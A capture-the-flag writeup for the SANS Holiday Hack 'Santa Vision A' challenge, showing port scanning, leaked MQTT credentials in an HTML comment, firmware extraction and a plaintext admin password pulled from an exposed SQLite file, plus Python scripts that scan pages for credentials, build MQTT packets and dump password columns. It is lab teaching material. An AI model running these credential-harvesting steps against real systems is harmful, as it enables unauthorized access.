Santa Vision A

Difficulty: ❄ ❄ ❄ ❄ ❄
What username logs you into the SantaVision portal?

Hints

Misplaced Credentials

From: Ribb Bonbowford
Objective: Santa Vision A
See if any credentials you find allow you to subscribe to any MQTT feeds.

Filesystem Analysis

From: Ribb Bonbowford
Objective: Santa Vision A
jefferson is great for analyzing JFFS2 file systems.

Database Pilfering

From: Ribb Bonbowford
Objective: Santa Vision A
Consider checking any database files for credentials…

Mosquito Mosquitto

From: Ribb Bonbowford
Mosquitto is a great client for interacting with MQTT, but their spelling may be suspect. Prefer a GUI? Try MQTTX

Silver

As a first step, I ran a full TCP port sweep (-p-) against the server with nmap to find what was listening (a full sweep is why the scan took almost an hour):

thedead@maccos act3-SantaVision % nmap 34.44.88.211 -p-
Nmap scan report for 211.88.44.34.bc.googleusercontent.com (34.44.88.211)
Host is up (0.16s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
1883/tcp open mqtt
5355/tcp filtered llmnr
8000/tcp open http-alt
9001/tcp open tor-orport

Nmap done: 1 IP address (1 host up) scanned in 3165.46 seconds

Reaching the website on http://34.56.1.154:8000, I got presented with a login page:

Getting past it was trivial: the HTML source of the page contains leftover credentials in a comment right after the footer:

<div class="footer" id="footer">
<b>©2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.<br>(<i>topic 'sitestatus'</i> available.)</b>
</div> <!-- mqtt: elfanon:elfanon -->

Logging in with user elfanon and password elfanon succeeds, and elfanon is the answer for the silver trophy.
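Viewing the source by hand works for one page, but the same check is worth automating across a whole site. The scanner below is an added example written for this writeup, not code from the challenge: it pulls every HTML comment out of a page and flags those shaped like "service: user:password", and separately picks up any "topic '...'" hint in the visible text, as the footer above advertises sitestatus. The sample page is constructed here (the footer from the writeup plus two extra comments, one of them a decoy, and the extra credential pair is invented for the sample).

```python
import re
from html.parser import HTMLParser

# Constructed sample page: the footer from the writeup plus two extra comments
# (one decoy, one more invented credential) so the scanner has something to tell apart.
SAMPLE_HTML = """<html><body>
<div class="footer" id="footer">
<b>&copy;2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.<br>(<i>topic 'sitestatus'</i> available.)</b>
</div> <!-- mqtt: elfanon:elfanon -->
<!-- TODO: remove debug footer before release -->
<!-- db: backup:Winter2024! -->
</body></html>"""

# "<label>: <user>:<password>" is the shape developers most often leave behind;
# the label is whatever service name precedes the pair (mqtt, db, ftp, ...).
CRED_RE = re.compile(
    r"(?P<service>[A-Za-z0-9_-]+)\s*:\s*(?P<user>[A-Za-z0-9_.@-]+):(?P<password>\S+)"
)
# Hints of the form "topic 'name'" point at MQTT topics worth subscribing to.
TOPIC_RE = re.compile(r"topic\s+'([^']+)'")


class _Collector(HTMLParser):
    """Collect every HTML comment and every visible text node separately."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.text = []

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_data(self, data):
        self.text.append(data)


def _collect(html):
    p = _Collector()
    p.feed(html)
    p.close()
    return p.comments, "".join(p.text)


def find_credentials(html):
    """Return [{service, user, password, comment}] for credential-shaped comments."""
    comments, _ = _collect(html)
    findings = []
    for c in comments:
        m = CRED_RE.search(c)
        if m:
            findings.append({**m.groupdict(), "comment": c})
    return findings


def find_topics(html):
    """Return MQTT topic names advertised in the page's visible text."""
    _, text = _collect(html)
    return TOPIC_RE.findall(text)


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_HTML):
        print(f"{f['service']}: {f['user']} / {f['password']}  <- {f['comment']!r}")
    print("topics:", find_topics(SAMPLE_HTML))
```

Comments are only one place to look; the same regex is worth running over inline scripts and JSON embedded in the page, which HTMLParser hands to handle_data.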

Gold

Following the hint in the footer (topic 'sitestatus' available.), I subscribed to the sitestatus topic as elfanon with mosquitto_sub. Among the other messages, one was particularly interesting:

thedead@maccos act3-SantaVision % mosquitto_sub -v -h 34.44.88.211 -p 1883 -u elfanon -P elfanon -t 'sitestatus'
# ... omitted ...
sitestatus File downloaded: /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ... omitted ...
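Port 1883 is plain TCP, so the username and password mosquitto_sub sends travel in the clear inside the MQTT CONNECT packet, which is why leaked MQTT credentials (and a sniffer on the path) are equally useful to an attacker. To make the wire format concrete, here is an added example, written for this writeup and not part of the challenge, that builds and parses MQTT 3.1.1 CONNECT, SUBSCRIBE and PUBLISH packets by hand following the OASIS MQTT 3.1.1 packet layouts; the client id "sv-probe" and the sample PUBLISH payload are constructed. (As a side note, nmap's "tor-orport" label for 9001 comes from its port table, not from probing; 9001 is also the port Mosquitto conventionally uses for a WebSockets listener, so it is worth checking with a browser-side MQTT client such as MQTTX.)

```python
import struct

# --- MQTT 3.1.1 framing helpers (packet layouts per the OASIS MQTT 3.1.1 spec) ---

def _enc_str(s):
    """UTF-8 string (or raw bytes) with a 2-byte big-endian length prefix."""
    b = s.encode("utf-8") if isinstance(s, str) else s
    return struct.pack("!H", len(b)) + b

def _enc_remaining_length(n):
    """Variable-length 'Remaining Length' field: 7 bits per byte, MSB = continuation."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | (0x80 if n else 0))
        if not n:
            return bytes(out)

def _dec_remaining_length(buf, i):
    value, mult = 0, 1
    while True:
        b = buf[i]
        i += 1
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, i
        mult *= 128

def _read_str(buf, i):
    (n,) = struct.unpack_from("!H", buf, i)
    i += 2
    return buf[i:i + n].decode("utf-8"), i + n

def build_connect(client_id, username=None, password=None, keepalive=60):
    """CONNECT with clean session; username/password flags set only when supplied."""
    flags = 0x02
    payload = _enc_str(client_id)
    if username is not None:
        flags |= 0x80
        payload += _enc_str(username)
    if password is not None:
        flags |= 0x40
        payload += _enc_str(password)
    var_header = _enc_str("MQTT") + bytes([0x04, flags]) + struct.pack("!H", keepalive)
    body = var_header + payload
    return bytes([0x10]) + _enc_remaining_length(len(body)) + body

def build_subscribe(packet_id, topic, qos=0):
    """SUBSCRIBE (type 8, fixed reserved flag bits 0010) for one topic filter."""
    body = struct.pack("!H", packet_id) + _enc_str(topic) + bytes([qos])
    return bytes([0x82]) + _enc_remaining_length(len(body)) + body

def build_publish(topic, payload, qos=0, packet_id=0):
    """PUBLISH as a broker delivers it; used here only to construct a sample message."""
    body = _enc_str(topic) + (struct.pack("!H", packet_id) if qos else b"") + payload
    return bytes([0x30 | (qos << 1)]) + _enc_remaining_length(len(body)) + body

def parse_connect(pkt):
    """Recover the CONNECT fields exactly as a sniffer on port 1883 would see them."""
    if pkt[0] != 0x10:
        raise ValueError("not a CONNECT packet")
    _, i = _dec_remaining_length(pkt, 1)
    proto, i = _read_str(pkt, i)
    level, flags = pkt[i], pkt[i + 1]
    i += 2
    (keepalive,) = struct.unpack_from("!H", pkt, i)
    i += 2
    client_id, i = _read_str(pkt, i)
    if flags & 0x04:  # will flag set: skip will topic and will message
        _, i = _read_str(pkt, i)
        _, i = _read_str(pkt, i)
    username = password = None
    if flags & 0x80:
        username, i = _read_str(pkt, i)
    if flags & 0x40:
        password, i = _read_str(pkt, i)
    return {"protocol": proto, "level": level, "keepalive": keepalive,
            "client_id": client_id, "username": username, "password": password}

def parse_publish(pkt):
    """Return (topic, payload bytes) of a PUBLISH packet."""
    if pkt[0] & 0xF0 != 0x30:
        raise ValueError("not a PUBLISH packet")
    qos = (pkt[0] >> 1) & 0x03
    rem, i = _dec_remaining_length(pkt, 1)
    end = i + rem
    topic, i = _read_str(pkt, i)
    if qos:
        i += 2  # packet identifier is only present for QoS 1 and 2
    return topic, pkt[i:end]

if __name__ == "__main__":
    connect = build_connect("sv-probe", "elfanon", "elfanon")  # constructed client id
    print(connect.hex())          # the ASCII of both credentials is visible in the hex
    print(parse_connect(connect))
    print(build_subscribe(1, "sitestatus").hex())
    sample = build_publish("sitestatus", b"File downloaded: /static/x/applicationDefault.bin")
    print(parse_publish(sample))
```

A real session is CONNECT, read CONNACK, SUBSCRIBE, read SUBACK, then a stream of PUBLISH frames; mosquitto_sub -v prints exactly the (topic, payload) pairs parse_publish returns. The fix on the broker side is a TLS listener (port 8883) with per-user ACLs, so that a leaked read-only account cannot also publish.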

Once the file /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin is downloaded, it can be unpacked with jefferson (it is a JFFS2 image) and its contents explored:

thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ... omitted ...
2024-12-23 12:27:10 (687 KB/s) - ‘applicationDefault.bin’ saved [7340032/7340032]
(act3-SantaVision) thedead@maccos act3-SantaVision % jefferson applicationDefault.bin
dumping fs to /Users/thedead/Desktop/repos/SANS_HolidayHack/2024/act3-SantaVision/jffs2-root (endianness: <)
# ... omitted ...
writing S_ISREG app/src/accounts/views.py
# ... omitted ...
writing S_ISREG app/src/core/views.py
# ... omitted ...

Looking at app/src/accounts/views.py, I found a Flask route that serves a SQLite database straight out of the static directory:

# ... omitted ...
@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
    return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)

Downloading this file and opening it with sqlite3, I found the user santaSiteAdmin, with its password stored in plaintext:

(act3-SantaVision) thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite
# ... omitted ...
2024-12-23 12:35:35 (80.2 KB/s) - ‘SantasTopSecretDB-2024-Z.sqlite’ saved [20480/20480]
(act3-SantaVision) thedead@maccos act3-SantaVision % sqlite3 SantasTopSecretDB-2024-Z.sqlite
# ... omitted ...
sqlite> .tables
alembic_version  users
sqlite> SELECT * FROM users;
1|santaSiteAdmin|S4n+4sr3411yC00Lp455wd|2024-01-23 06:05:29.466071|1

Using the santaSiteAdmin credentials I could log in to the web page again, and santaSiteAdmin is the answer for the gold trophy.
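Reading views.py by eye is fine for one firmware image, but the two things that cracked this level (a route that hands a file straight back to the client, and a database with passwords stored in clear) are exactly what a triage script should hunt for in any tree jefferson dumps. The script below is an added example written for this writeup, not part of the challenge or of jefferson: it walks an extracted root, flags Flask routes whose handler calls send_from_directory or send_file, finds SQLite files by their 16-byte header rather than by extension, and dumps every table with a password-like column, marking values that do not look like a hash. The sample tree it builds is constructed from the fragments shown above; the column names of the users table and the location of the static directory are assumptions, since the page only shows the row values.

```python
import os
import re
import sqlite3
import tempfile

# Flask route decorators and the calls that hand a file on disk straight back to the client.
ROUTE_RE = re.compile(r"""@\w+\.route\(\s*["']([^"']+)["']""")
SERVE_RE = re.compile(r"""\b(send_from_directory|send_file)\(\s*["']?([^,"')]+)""")
PW_COL = re.compile(r"pass|pwd|secret", re.I)
USER_COL = re.compile(r"user|login|email|name", re.I)
SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 file


def find_file_serving_routes(root, lookahead=6):
    """Routes whose handler (within `lookahead` lines of the decorator) serves a file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                lines = f.read().splitlines()
            for idx, line in enumerate(lines):
                m = ROUTE_RE.search(line)
                if not m:
                    continue
                body = "\n".join(lines[idx + 1: idx + 1 + lookahead])  # may overrun into the next handler
                s = SERVE_RE.search(body)
                if s:
                    findings.append({"file": os.path.relpath(path, root), "route": m.group(1),
                                     "call": s.group(1), "directory": s.group(2).strip()})
    return findings


def find_db_files(root):
    """SQLite databases located by file header, so renamed or extension-less files are caught too."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    if f.read(16) == SQLITE_MAGIC:
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def looks_hashed(value):
    """True for common password-hash shapes (modular crypt, RFC 2307, werkzeug, bare hex digests)."""
    v = str(value)
    if v.startswith(("$", "{", "pbkdf2:", "scrypt:")):
        return True
    return re.fullmatch(r"[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64}", v) is not None


def dump_credentials(db_path):
    """Every row of every table with a password-like column, flagged when stored in clear."""
    findings = []
    con = sqlite3.connect(db_path)
    try:
        tables = [r[0] for r in con.execute("SELECT name FROM sqlite_master WHERE type='table'")]
        for t in tables:  # table names come from sqlite_master of a local file; quoting suffices here
            cols = [r[1] for r in con.execute(f'PRAGMA table_info("{t}")')]
            pw_cols = [c for c in cols if PW_COL.search(c)]
            if not pw_cols:
                continue
            user_col = next((c for c in cols if USER_COL.search(c)), None)
            for row in con.execute(f'SELECT * FROM "{t}"'):
                rec = dict(zip(cols, row))
                for pc in pw_cols:
                    findings.append({"table": t, "username": rec.get(user_col), "column": pc,
                                     "value": rec[pc], "plaintext": not looks_hashed(rec[pc])})
    finally:
        con.close()
    return findings


# Constructed stand-in for the jffs2-root tree: the route shown above plus a harmless one.
SAMPLE_VIEWS = '''from flask import Blueprint, send_from_directory
accounts_bp = Blueprint("accounts", __name__)

@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
    return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)

@accounts_bp.route("/login", methods=["GET", "POST"])
def login():
    return "login form"
'''


def build_sample_tree():
    """Write the constructed tree to a temp dir; users column names are assumed, not from the page."""
    root = tempfile.mkdtemp(prefix="jffs2-root-")
    src = os.path.join(root, "app", "src", "accounts")
    os.makedirs(src)
    with open(os.path.join(src, "views.py"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_VIEWS)
    static = os.path.join(root, "app", "src", "static", "sv2024DB-Santa")  # assumed location
    os.makedirs(static)
    con = sqlite3.connect(os.path.join(static, "SantasTopSecretDB-2024-Z.sqlite"))
    con.execute("CREATE TABLE alembic_version (version_num TEXT)")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, "
                "created_on TEXT, is_admin INTEGER)")
    con.execute("INSERT INTO users VALUES (1, 'santaSiteAdmin', 'S4n+4sr3411yC00Lp455wd', "
                "'2024-01-23 06:05:29.466071', 1)")
    con.commit()
    con.close()
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    print(find_file_serving_routes(root))
    for db in find_db_files(root):
        print(db, dump_credentials(db))
```

Run it as python triage.py jffs2-root on a real dump. The two findings map directly onto the fixes the application needs: no route should expose a database file (and certainly not from the static directory, which is served without authentication), and passwords must be stored as salted hashes rather than in clear.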